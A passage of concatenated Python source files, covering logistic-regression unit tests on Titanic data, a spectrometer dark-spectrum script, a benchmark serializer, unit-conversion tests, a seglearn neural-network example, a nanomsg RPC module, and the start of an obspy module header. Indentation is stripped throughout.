result_required = [0.40616246498599445, 0.24581360407372244, 0.23089275089703268, 0.3999162261394402, 0.3539768140703711, 0.39737068898845873, 0.4064703482674913]
result_actual = list(my_logistic_regresion_class.get_interpretation()['Probability'])
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (result_required == result_actual)
result_required = [0.22395117322839098, 0.23089275089703268, 0.35583110026571313,
0.3977261128754439, 0.4027792667251947, 0.4068054774641371]
result_actual = sorted(list(my_logistic_regresion_class.feature_interpretability_comparative_df['Prediction_add1_or_with']))
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (result_required == result_actual)
result_required = [0.98, 0.98, 0.98, 0.97, 0.97, 0.97, 0.97, 0.97, 0.97]
result_actual = sorted(list(my_logistic_regresion_class.predict_from_original(df)))[:-10:-1]
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (result_required == result_actual)
print('Success!')
def unit_test_4():
print('Unit test 4...')
import sys
import os
import warnings
np.random.seed(101)
#warnings.filterwarnings("ignore")
current_dir = '/'.join(sys.path[0].split('/')[:-1]) # sys.path[0]
data_dir = os.path.join(current_dir, 'Data', 'titanic')
titanic_csv = os.path.join(data_dir, 'titanic.csv')
df = pd.read_csv(titanic_csv)
df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp','Parch', 'Fare']]
df = df.dropna()
my_logistic_regresion_class = LogisticRegressionClass(df,'Survived',sig_level=0.05)
my_logistic_regresion_class.log_reg_with_feature_selection(verbose=False)
result_required = [2.98, 2.62, -1.32, -0.04, -0.38]
result_actual = list(my_logistic_regresion_class.result_with_feature_selection.params)
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (sorted(result_required) == sorted(result_actual))
result_required = 0.4061624649859944
result_actual = my_logistic_regresion_class.result_with_feature_selection.predict(my_logistic_regresion_class.X_with_feature_selection).mean()
result_required = round(result_required, 2)
result_actual = round(result_actual, 2)
assert (result_required == result_actual)
result_required = '''Performance (0 is negative 1 is positive)
5-Fold Cross Validation Results:
Test Set accuracy = 0.8
f1 = 0.74
precision = 0.78
recall = 0.72
auc = 0.85'''
result_actual = my_logistic_regresion_class.log_reg_diagnostic_performance(my_logistic_regresion_class.X_with_feature_selection,
my_logistic_regresion_class.y_with_feature_selection)
assert (result_required == result_actual)
result_required = [0.4061624649859944, 0.236473141666754, 0.7141621577909735, 0.3998399415589254, 0.3537524130019424]
result_actual = list(my_logistic_regresion_class.get_interpretation()['Probability'])
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (result_required == result_actual)
result_required = [365, 59, 78, 212]
result_actual = my_logistic_regresion_class.logistic_regression_get_report(verbose=False)
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), list(np.array(result_actual).flatten())))
assert (result_required == result_actual)
result_required = [0.98, 0.97, 0.97, 0.97, 0.97, 0.97, 0.97, 0.97, 0.97]
result_actual = sorted(list(my_logistic_regresion_class.predict_from_original(df)))[:-10:-1]
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (result_required == result_actual)
print('Success!')
def unit_test_5():
print('Unit test 5...')
import sys
import os
import warnings
np.random.seed(101)
#warnings.filterwarnings("ignore")
current_dir = '/'.join(sys.path[0].split('/')[:-1]) # sys.path[0]
data_dir = os.path.join(current_dir, 'Data', 'titanic')
titanic_csv = os.path.join(data_dir, 'titanic.csv')
df = pd.read_csv(titanic_csv)
df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp','Parch', 'Fare']]
df.loc[1,'Survived'] = np.nan
my_logistic_regresion_class = LogisticRegressionClass(df,'Survived',sig_level=0.05)
my_logistic_regresion_class.log_reg()
result_required = [5.38, -1.24, -0.04, -0.38, -0.06, 0.0, -2.63]
result_actual = list(my_logistic_regresion_class.result.params)
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (sorted(result_required) == sorted(result_actual))
print('Success!')
def unit_test_6():
print('Unit test 6...')
import sys
import os
import warnings
np.random.seed(101)
#warnings.filterwarnings("ignore")
current_dir = '/'.join(sys.path[0].split('/')[:-1]) # sys.path[0]
data_dir = os.path.join(current_dir, 'Data', 'titanic')
titanic_csv = os.path.join(data_dir, 'titanic.csv')
df = pd.read_csv(titanic_csv)
df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp','Parch', 'Fare']]
df.loc[1,'Survived'] = np.nan
for col in df.columns:
if col in ['Pclass','Parch']:
df[col] = df[col].astype('str')
my_logistic_regresion_class = LogisticRegressionClass(df,'Survived',sig_level=0.05,cols_to_keep_static=['Pclass'])
my_logistic_regresion_class.log_reg_with_feature_selection(verbose=False)
result_required = [1.7, -1.41, -2.65, 2.62, -0.04, -0.38]
result_actual = list(my_logistic_regresion_class.result_with_feature_selection.params)
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (sorted(result_required) == sorted(result_actual))
print('Success!')
def unit_test_7():
print('Unit test 7...')
import sys
import os
import warnings
np.random.seed(101)
#warnings.filterwarnings("ignore")
current_dir = '/'.join(sys.path[0].split('/')[:-1]) # sys.path[0]
data_dir = os.path.join(current_dir, 'Data', 'titanic')
titanic_csv = os.path.join(data_dir, 'titanic.csv')
df = pd.read_csv(titanic_csv)
df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp','Parch', 'Fare']]
for col in df.columns:
if col in ['Pclass','Parch']:
df[col] = df[col].astype('str')
my_logistic_regresion_class = LogisticRegressionClass(df,'Survived',sig_level=0.05,cols_to_keep_static=['Pclass'],
cols_to_try_individually=['Parch','Sex','Age','Fare'],
max_iter=1000)
my_logistic_regresion_class.log_reg_one_at_a_time(with_feature_selection=True)
result_required = [-0.73, 2.64, -0.04, 0.01]
result_actual = list(my_logistic_regresion_class.df_one_at_a_time['Coefficient'])
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (sorted(result_required) == sorted(result_actual))
print('Success!')
def unit_test_8():
print('Unit test 8...')
import sys
import os
import warnings
np.random.seed(101)
#warnings.filterwarnings("ignore")
current_dir = '/'.join(sys.path[0].split('/')[:-1]) # sys.path[0]
data_dir = os.path.join(current_dir, 'Data', 'titanic')
titanic_csv = os.path.join(data_dir, 'titanic.csv')
df = pd.read_csv(titanic_csv)
df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp','Parch', 'Fare']]
for col in df.columns:
if col in ['Pclass','Parch']:
df[col] = df[col].astype('str')
my_logistic_regresion_class = LogisticRegressionClass(df,'Survived',sig_level=0.05,cols_to_keep_static=['Pclass'],
cols_to_try_individually=['Age','Fare'],
max_iter=1000)
my_logistic_regresion_class.log_reg_one_at_a_time(with_feature_selection=False)
result_required = [-0.04, 0.01]
result_actual = list(my_logistic_regresion_class.df_one_at_a_time['Coefficient'])
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (sorted(result_required) == sorted(result_actual))
print('Success!')
def unit_test_9():
print('Unit test 9...')
import sys
import os
import warnings
np.random.seed(101)
#warnings.filterwarnings("ignore")
current_dir = '/'.join(sys.path[0].split('/')[:-1]) # sys.path[0]
data_dir = os.path.join(current_dir, 'Data', 'titanic')
titanic_csv = os.path.join(data_dir, 'titanic.csv')
df = pd.read_csv(titanic_csv)
df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp','Parch', 'Fare']]
for col in df.columns:
if col in ['Pclass','Parch']:
df[col] = df[col].astype('str')
my_logistic_regresion_class = LogisticRegressionClass(df,'Survived',sig_level=0.05,cols_to_keep_static=['Pclass'],
cols_to_try_individually=['Age','Fare'],
max_iter=1000)
my_logistic_regresion_class.log_reg_one_at_a_time(with_feature_selection=False,get_interpretability=True)
result_required = [0.4, 0.39]
result_actual = list(my_logistic_regresion_class.df_one_at_a_time['Controlled Probability'])
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (sorted(result_required) == sorted(result_actual))
print('Success!')
def unit_test_10():
print('Unit test 10...')
import sys
import os
import warnings
np.random.seed(101)
#warnings.filterwarnings("ignore")
current_dir = '/'.join(sys.path[0].split('/')[:-1]) # sys.path[0]
data_dir = os.path.join(current_dir, 'Data', 'titanic')
titanic_csv = os.path.join(data_dir, 'titanic.csv')
df = pd.read_csv(titanic_csv)
df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp','Parch', 'Fare']]
for col in df.columns:
if col in ['Pclass','Parch']:
df[col] = df[col].astype('str')
my_logistic_regresion_class = LogisticRegressionClass(df,'Survived',sig_level=0.05,cols_to_keep_static=['Pclass'],
cols_to_try_individually=['Age','Fare','Parch','Sex'],
max_iter=1000)
my_logistic_regresion_class.log_reg_one_at_a_time(with_feature_selection=True,get_interpretability=True)
result_required = [0.4, 0.39, 0.35, 0.72]
result_actual = list(my_logistic_regresion_class.df_one_at_a_time['Controlled Probability'])
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (sorted(result_required) == sorted(result_actual))
print('Success!')
def unit_test_11():
print('Unit test 11...')
import sys
import os
import warnings
np.random.seed(101)
#warnings.filterwarnings("ignore")
current_dir = '/'.join(sys.path[0].split('/')[:-1]) # sys.path[0]
data_dir = os.path.join(current_dir, 'Data', 'titanic')
titanic_csv = os.path.join(data_dir, 'titanic.csv')
df = pd.read_csv(titanic_csv)
df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp','Parch', 'Fare']]
df.loc[1,'Survived'] = np.nan
for col in df.columns:
if col in ['Pclass','Parch']:
df[col] = df[col].astype('str')
my_logistic_regresion_class = LogisticRegressionClass(df,'Survived',sig_level=0.05,cols_to_keep_static=['Pclass'])
my_logistic_regresion_class.log_reg_with_feature_selection(verbose=True,max_pr2=0.32)
result_required = [1.25, -1.31, -2.58, 2.52, -0.04]
result_actual = list(my_logistic_regresion_class.result_with_feature_selection.params)
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (sorted(result_required) == sorted(result_actual))
print('Success!')
def unit_test_12():
print('Unit test 12...')
import sys
import os
import warnings
np.random.seed(101)
#warnings.filterwarnings("ignore")
current_dir = '/'.join(sys.path[0].split('/')[:-1]) # sys.path[0]
data_dir = os.path.join(current_dir, 'Data', 'titanic')
titanic_csv = os.path.join(data_dir, 'titanic.csv')
df = pd.read_csv(titanic_csv)
df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp','Parch', 'Fare']]
df.loc[1,'Survived'] = np.nan
for col in df.columns:
if col in ['Pclass','Parch']:
df[col] = df[col].astype('str')
my_logistic_regresion_class = LogisticRegressionClass(df,'Survived',sig_level=0.05,cols_to_keep_static=['Pclass'])
my_logistic_regresion_class.log_reg_with_feature_selection(verbose=True,max_features=2)
result_required = [1.25, -1.31, -2.58, 2.52, -0.04]
result_actual = list(my_logistic_regresion_class.result_with_feature_selection.params)
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (sorted(result_required) == sorted(result_actual))
print('Success!')
def unit_test_13():
print('Unit test 13...')
import sys
import os
import warnings
np.random.seed(101)
#warnings.filterwarnings("ignore")
current_dir = '/'.join(sys.path[0].split('/')[:-1]) # sys.path[0]
data_dir = os.path.join(current_dir, 'Data', 'titanic')
titanic_csv = os.path.join(data_dir, 'titanic.csv')
df = pd.read_csv(titanic_csv)
df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp','Parch', 'Fare']]
df.loc[1,'Survived'] = np.nan
for col in df.columns:
if col in ['Pclass','Parch']:
df[col] = df[col].astype('str')
my_logistic_regresion_class = LogisticRegressionClass(df,'Survived',sig_level=0.05,cols_to_keep_static=['Pclass'])
my_logistic_regresion_class.log_reg_with_feature_selection(verbose=True,max_features=2,max_pr2=0.3)
result_required = [-0.24, -0.92, -1.97, 2.57]
result_actual = list(my_logistic_regresion_class.result_with_feature_selection.params)
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (sorted(result_required) == sorted(result_actual))
print('Success!')
def unit_test_14():
print('Unit test 14...')
import sys
import os
import warnings
np.random.seed(101)
#warnings.filterwarnings("ignore")
current_dir = '/'.join(sys.path[0].split('/')[:-1]) # sys.path[0]
data_dir = os.path.join(current_dir, 'Data', 'titanic')
titanic_csv = os.path.join(data_dir, 'titanic.csv')
df = pd.read_csv(titanic_csv)
df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp','Parch', 'Fare']]
df['Survived'] = df['Survived'].astype('str')
my_logistic_regresion_class = LogisticRegressionClass(df,'Survived',sig_level=0.05)
my_logistic_regresion_class.log_reg()
result_required = '\nThe response variable should be binary 0 and 1 and numeric type (i.e. int)'
result_actual = my_logistic_regresion_class.error_message
assert (result_required == result_actual)
print('Success!')
def unit_test_15():
print('Unit test 15...')
import sys
import os
import warnings
np.random.seed(101)
#warnings.filterwarnings("ignore")
current_dir = '/'.join(sys.path[0].split('/')[:-1]) # sys.path[0]
data_dir = os.path.join(current_dir, 'Data', 'titanic')
titanic_csv = os.path.join(data_dir, 'titanic.csv')
df = pd.read_csv(titanic_csv)
df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp','Parch', 'Fare']]
df['AllZeros'] = 0
df['Survived'] = df['Survived'].astype('int')
my_logistic_regresion_class = LogisticRegressionClass(df,'Survived',sig_level=0.05,max_iter=5)
my_logistic_regresion_class.log_reg_with_feature_selection()
result_required = 'Singular matrix'
result_actual = str(my_logistic_regresion_class.exception_message)
assert (result_required == result_actual)
print('Success!')
def unit_test_16():
print('Unit test 16...')
import sys
import os
import warnings
np.random.seed(101)
#warnings.filterwarnings("ignore")
current_dir = '/'.join(sys.path[0].split('/')[:-1]) # sys.path[0]
data_dir = os.path.join(current_dir, 'Data', 'titanic')
titanic_csv = os.path.join(data_dir, 'titanic.csv')
df = pd.read_csv(titanic_csv)
df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp','Parch', 'Fare']]
df['Survived'] = df['Survived'].astype('int')
my_logistic_regresion_class = LogisticRegressionClass(df,'Survived',sig_level=0.05,max_iter=500,regularization_C=0)
my_logistic_regresion_class.log_reg()
result_required = [5.389003106421364, -1.2422486253277716, -0.043952595897772714, -0.3757548705084541, -0.0619373664480337, 0.002160033540727774, -2.6348448348873723]
result_actual = list(my_logistic_regresion_class.result.params)
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (sorted(result_required) == sorted(result_actual))
my_logistic_regresion_class = LogisticRegressionClass(df, 'Survived', sig_level=0.05, max_iter=500,
regularization_C=2)
my_logistic_regresion_class.log_reg()
result_required = [4.405751074517862, -1.019718809617492, -0.035243106198760185, -0.3133464821793585, -0.03593459183804765, 0.0036461299221873813, -2.4156954170686182]
result_actual = list(my_logistic_regresion_class.result.params)
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (sorted(result_required) == sorted(result_actual))
result_required = '''Performance (0 is negative 1 is positive)
5-Fold Cross Validation Results:
Test Set accuracy = 0.78
f1 = 0.72
precision = 0.76
recall = 0.69
auc = 0.85'''
result_actual = my_logistic_regresion_class.log_reg_diagnostic_performance()
assert (result_required == result_actual)
print('Success!')
if __name__ == '__main__':
unit_test_1()
unit_test_2()
unit_test_3()
unit_test_4()
unit_test_5()
unit_test_6()
unit_test_7()
unit_test_8()
unit_test_9()
unit_test_10()
unit_test_11()
unit_test_12()
unit_test_13()
unit_test_14()
unit_test_15()
unit_test_16() |
# -*- coding: utf-8 -*-
# =============================================================================
# Created By : Maximilian Sender
# Copyright : Copyright 2021, Institute of Chemical Engineering, Prof. Dr. Dirk Ziegenbalg, Ulm University'
# License : GNU LGPL
# =============================================================================
"""The module Darkspec complements the module Radiometric_measurement and creates a dark spectrum for a measurement
with no switchable light source. Must be run in an ITOM environment.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
# =============================================================================
# Imports
# =============================================================================
import numpy as np
import queue
import time
import matplotlib.pyplot as plt
try:
spec = dataIO("AvantesAvaSpec", 6546, 1639)
except:
del spec
spec = dataIO("AvantesAvaSpec", 6546, 1639)
int_time = 0.35
averages = 2
def dunkel():
spec.acquire()
time.sleep(int_time*averages)
lambda_table = spec.getParam("lambda_table")
data = dataObject([1, 2048], 'float32')
spec.copyVal(data)
dunkel_spec = (list(data))
global dunkel_spec
del dunkel_spec[1062:2048]
del dunkel_spec[0:203]
print("dunkel")
# print ("dunkelend")
spec.startDevice()
spec.setParam("integration_time", int_time)
spec.setParam("dark_correction", 0)
spec.setParam("average", averages)
print("wait")
time.sleep(5)
dunkel()
all_data = dataObject([1,859],'float32', data=dunkel_spec)
# all_data = dataObject([1,1062],'float32', data = dunkel_spec)
# plot(all_data, className = 'itom1dqwtplot')
plt.plot(all_data)
savetext = str("TransferCurves/dark_"+str(int_time).replace('.', '_')+'_av'+str(averages)+'.csv')
np.savetxt(savetext, np.transpose(all_data), delimiter=';')
spec.stopDevice()
del spec
|
from texttable import Texttable
def args_print(args, logger):
_dict = vars(args)
table = Texttable()
table.add_row(["Parameter", "Value"])
for k in _dict:
table.add_row([k, _dict[k]])
logger.info(table.draw())
|
# This file is part of the Reproducible Open Benchmarks for Data Analysis
# Platform (ROB).
#
# Copyright (C) 2019 NYU.
#
# ROB is free software; you can redistribute it and/or modify it under the
# terms of the MIT License; see LICENSE file for more details.
"""Interface to serialize benchmark resource objects."""
from benchengine.api.serialize.base import Serializer
import benchengine.api.serialize.hateoas as hateoas
import benchengine.api.serialize.labels as labels
class BenchmarkSerializer(Serializer):
"""Serializer for benchmark resource objects. Defines the methods that are
used to serialize benchmark descriptors and handles.
"""
def __init__(self, urls):
"""Initialize the reference to the Url factory.
Parameters
----------
urls: benchengine.api.route.UrlFactory
Factory for resource urls
"""
super(BenchmarkSerializer, self).__init__(urls)
def benchmark_descriptor(self, benchmark):
"""Get dictionary serialization containing the descriptor of a
benchmark resource.
Parameters
----------
benchmark: benchengine.benchmark.base.BenchmarkDescriptor
Competition handle
Returns
-------
dict
"""
benchmark_id = benchmark.identifier
leaderboard_url = self.urls.get_leaderboard(benchmark_id)
obj = {
labels.ID: benchmark_id,
labels.NAME: benchmark.name,
labels.LINKS: hateoas.serialize({
hateoas.SELF: self.urls.get_benchmark(benchmark_id),
hateoas.benchmark(hateoas.LEADERBOARD): leaderboard_url
})
}
if benchmark.has_description():
obj[labels.DESCRIPTION] = benchmark.description
if benchmark.has_instructions():
obj[labels.INSTRUCTIONS] = benchmark.instructions
return obj
def benchmark_handle(self, benchmark):
"""Get dictionary serialization containing the handle of a
benchmark resource.
Parameters
----------
benchmark: enataengine.benchmark.base.BenchmarkHandle
Handle for benchmark resource
Returns
-------
dict
"""
obj = self.benchmark_descriptor(benchmark)
# Add parameter declarations to the serialized benchmark descriptor
obj[labels.PARAMETERS] = [p.to_dict() for p in benchmark.template.parameters.values()]
return obj
def benchmark_leaderboard(self, benchmark, leaderboard):
"""Get dictionary serialization for a benchmark leaderboard.
Parameters
----------
benchmark: enataengine.benchmark.base.BenchmarkHandle
Handle for benchmark resource
leaderboard: list(benchengine.benchmark.base.LeaderboardEntry)
List of entries in the benchmark leaderboard
Returns
-------
dict
"""
runs = list()
for run in leaderboard:
results = list()
for key in run.results:
results.append({labels.ID: key, labels.VALUE: run.results[key]})
runs.append({
labels.USERNAME: run.user.username,
labels.RESULTS: results
})
return {
labels.SCHEMA: [{
labels.ID: c.identifier,
labels.NAME: c.name,
labels.DATA_TYPE: c.data_type
} for c in benchmark.template.schema.columns
],
labels.RUNS: runs
}
def benchmark_listing(self, benchmarks):
"""Get dictionary serialization of a benchmark listing.
Parameters
----------
benchmarks: list(benchengine.benchmark.base.BenchmarkDescriptor)
List of benchmark descriptors
Returns
-------
dict
"""
return {
labels.BENCHMARKS: [self.benchmark_descriptor(b) for b in benchmarks],
labels.LINKS: hateoas.serialize({
hateoas.SELF: self.urls.list_benchmarks()
})
}
def benchmark_run(self, benchmark_id, run_id, state):
"""Get dictionary serialization for the current state of a benchmark
run.
Parameters
----------
benchmark_id: string
Unique benchmark identifier
run_id: string
Unique run identifier
state: benchtmpl.workflow.state.WorkflowState
Current run state
Returns
-------
dict
"""
obj = {
labels.ID: run_id,
labels.STATE: state.type_id
}
# If the workflow is not in pending mode it has a started_at timestamp
if not state.is_pending():
obj[labels.STARTED_AT] = state.started_at.isoformat()
# If the workflow is not active it has a finished_at timestamp
if not state.is_active():
obj[labels.FINISHED_AT] = state.finished_at.isoformat()
# If the workflow is in error state it has a list of error messages
if state.is_error():
obj[labels.MESSAGES] = state.messages
return obj
|
import unittest
import quantities as pq
from semantic.units import ConversionService
class TestConversion(unittest.TestCase):
def compareConversion(self, inp, target):
service = ConversionService()
result = service.convert(inp)
self.assertEqual(result.magnitude, target.magnitude)
self.assertEqual(result.units, target.units)
def testSimple(self):
inp = "55.12 kilograms to pounds"
target = pq.Quantity(55.12, "kg")
target.units = "pounds"
self.compareConversion(inp, target)
def testPer(self):
inp = "fifty one point two kilograms per meter to pounds per foot"
target = pq.Quantity(51.2, "kg / meter")
target.units = "pounds / ft"
self.compareConversion(inp, target)
def testReadability(self):
inp = "convert 0.000013 inches to centimeters"
target = pq.Quantity(0.000013, "inches")
target.units = "cm"
# Correctness of conversion
self.compareConversion(inp, target)
# Correctness of representation
service = ConversionService()
self.assertEqual(service.parseUnits(inp),
"3.3 times ten to the negative 5 cm")
def testFloat(self):
inp = "what is eleven and two thirds pounds converted to kilograms"
target = pq.Quantity(11 + 2.0 / 3, "pounds")
target.units = "kg"
self.compareConversion(inp, target)
def testExtraction(self):
inp = "I want three pounds of eggs and two inches per squared foot"
service = ConversionService()
units = service.extractUnits(inp)
self.assertEqual(units, ['pounds', 'inches / foot^2'])
def testExponentiation(self):
service = ConversionService()
inp = "I want two squared meters"
units = service.extractUnits(inp)
self.assertEqual(units, ['meters^2'])
inp = "I want two square meters"
units = service.extractUnits(inp)
self.assertEqual(units, ['meters^2'])
inp = "I want two sq meters"
units = service.extractUnits(inp)
self.assertEqual(units, ['meters^2'])
inp = "I want two cubic meters"
units = service.extractUnits(inp)
self.assertEqual(units, ['meters^3'])
inp = "I want two meters cubed"
units = service.extractUnits(inp)
self.assertEqual(units, ['meters^3'])
inp = "I want two meters to the fifth power"
units = service.extractUnits(inp)
self.assertEqual(units, ['meters^5'])
inp = "I want two meters to the fifth"
units = service.extractUnits(inp)
self.assertEqual(units, ['meters^5'])
def testComplex(self):
inp = "Seven and a half pounds per square ft to kg per meter squared"
target = pq.Quantity(7.5, "lb/ft**2")
target.units = "kg/m**2"
self.compareConversion(inp, target)
if __name__ == "__main__":
suite = unittest.TestLoader().loadTestsFromTestCase(TestConversion)
unittest.TextTestRunner(verbosity=2).run(suite)
|
"""
=======================================
Plotting Neural Network Training Curves
=======================================
This is a basic example using a convolutional recurrent neural network to learn segments directly from time series data
"""
# Author: David Burns
# License: BSD
import matplotlib.pyplot as plt
import numpy as np
from tensorflow.python.keras.layers import Dense, LSTM, Conv1D
from tensorflow.python.keras.models import Sequential
from tensorflow.python.keras.wrappers.scikit_learn import KerasClassifier
from pandas import DataFrame
from sklearn.model_selection import train_test_split
from seglearn.datasets import load_watch
from seglearn.pipe import Pype
from seglearn.transform import Segment
##############################################
# Simple NN Model
##############################################
def crnn_model(width=100, n_vars=6, n_classes=7, conv_kernel_size=5,
conv_filters=3, lstm_units=3):
input_shape = (width, n_vars)
model = Sequential()
model.add(Conv1D(filters=conv_filters, kernel_size=conv_kernel_size,
padding='valid', activation='relu', input_shape=input_shape))
model.add(LSTM(units=lstm_units, dropout=0.1, recurrent_dropout=0.1))
model.add(Dense(n_classes, activation="softmax"))
model.compile(loss='categorical_crossentropy', optimizer='adam',
metrics=['accuracy'])
return model
##############################################
# Setup
##############################################
# load the data
data = load_watch()
X = data['X']
y = data['y']
# split the data
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42)
# create a segment learning pipeline
pipe = Pype([('seg', Segment(width=100, step=100, order='C')),
('crnn', KerasClassifier(build_fn=crnn_model, epochs=4, batch_size=256,
verbose=0, validation_split=0.2))])
##############################################
# Accessing training history
##############################################
# this is a bit of a hack, because history object is returned by the
# keras wrapper when fit is called
# this approach won't work with a more complex estimator pipeline, in which case
# a callable class with the desired properties should be made passed to build_fn
pipe.fit(X_train, y_train)
history = pipe.history.history
print(DataFrame(history))
# depends on version
if 'accuracy' in history:
ac_train = history['accuracy']
ac_val = history['val_accuracy']
elif 'acc' in history:
ac_train = history['acc']
ac_val = history['val_acc']
else:
raise ValueError("History object doesn't contain accuracy record")
epoch = np.arange(len(ac_train)) + 1
##############################################
# Training Curves
##############################################
plt.plot(epoch, ac_train, 'o', label="train")
plt.plot(epoch, ac_val, '+', label="validation")
plt.xlabel("Epoch")
plt.ylabel("Accuracy")
plt.legend()
plt.show()
|
'''
The MIT License (MIT)
Copyright (c) 2016 Tony Walker
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import uuid
import nanomsg
import logging
from .error import DecodeError
from .error import RequestParseError
from .error import AuthenticateError
from .error import AuthenticatorInvalidSignature
from .encoder import MsgPackEncoder
from .core import Endpoint
from .core import Process
class Responder(Endpoint, Process):
""" A service which responds to requests """
# pylint: disable=too-many-arguments
# pylint: disable=no-member
def __init__(self, address, encoder=None, authenticator=None,
socket=None, bind=True, timeouts=(None, None)):
# Defaults
socket = socket or nanomsg.Socket(nanomsg.REP)
encoder = encoder or MsgPackEncoder()
super(Responder, self).__init__(
socket, address, bind, encoder, authenticator, timeouts)
self.methods = {}
self.descriptions = {}
def execute(self, method, args, ref):
""" Execute the method with args """
response = {'result': None, 'error': None, 'ref': ref}
fun = self.methods.get(method)
if not fun:
response['error'] = 'Method `{}` not found'.format(method)
else:
try:
response['result'] = fun(*args)
except Exception as exception:
logging.error(exception, exc_info=1)
response['error'] = str(exception)
return response
def register(self, name, fun, description=None):
""" Register function on this service """
self.methods[name] = fun
self.descriptions[name] = description
@classmethod
def parse(cls, payload):
""" Parse client request """
try:
method, args, ref = payload
except Exception as exception:
raise RequestParseError(exception)
else:
return method, args, ref
# pylint: disable=logging-format-interpolation
def process(self):
""" Receive data from socket and process request """
response = None
try:
payload = self.receive()
method, args, ref = self.parse(payload)
response = self.execute(method, args, ref)
except AuthenticateError as exception:
logging.error(
'Service error while authenticating request: {}'
.format(exception), exc_info=1)
except AuthenticatorInvalidSignature as exception:
logging.error(
'Service error while authenticating request: {}'
.format(exception), exc_info=1)
except DecodeError as exception:
logging.error(
'Service error while decoding request: {}'
.format(exception), exc_info=1)
except RequestParseError as exception:
logging.error(
'Service error while parsing request: {}'
.format(exception), exc_info=1)
else:
logging.debug('Service received payload: {}'.format(payload))
if response:
self.send(response)
else:
self.send('')
class Requester(Endpoint):
""" A requester client """
# pylint: disable=too-many-arguments
# pylint: disable=no-member
def __init__(self, address, encoder=None, authenticator=None,
socket=None, bind=False, timeouts=(None, None)):
# Defaults
socket = socket or nanomsg.Socket(nanomsg.REQ)
encoder = encoder or MsgPackEncoder()
super(Requester, self).__init__(
socket, address, bind, encoder, authenticator, timeouts)
@classmethod
def build_payload(cls, method, args):
""" Build the payload to be sent to a `Responder` """
ref = str(uuid.uuid4())
return (method, args, ref)
# pylint: disable=logging-format-interpolation
def call(self, method, *args):
""" Make a call to a `Responder` and return the result """
payload = self.build_payload(method, args)
logging.debug('* Client will send payload: {}'.format(payload))
self.send(payload)
res = self.receive()
assert payload[2] == res['ref']
return res['result'], res['error']
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Provides the Inventory class.
:copyright:
Lion Krischer (krischer@geophysik.uni-muenchen.de), 2013
:license:
GNU Lesser General Public License, Version 3
(https://www.gnu.org/copyleft/lesser.html)
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from future.builtins import * # NOQA
from future.utils import python_2_unicode_compatible, native_str
import copy
import fnmatch
import os
import textwrap
import warnings
import obspy
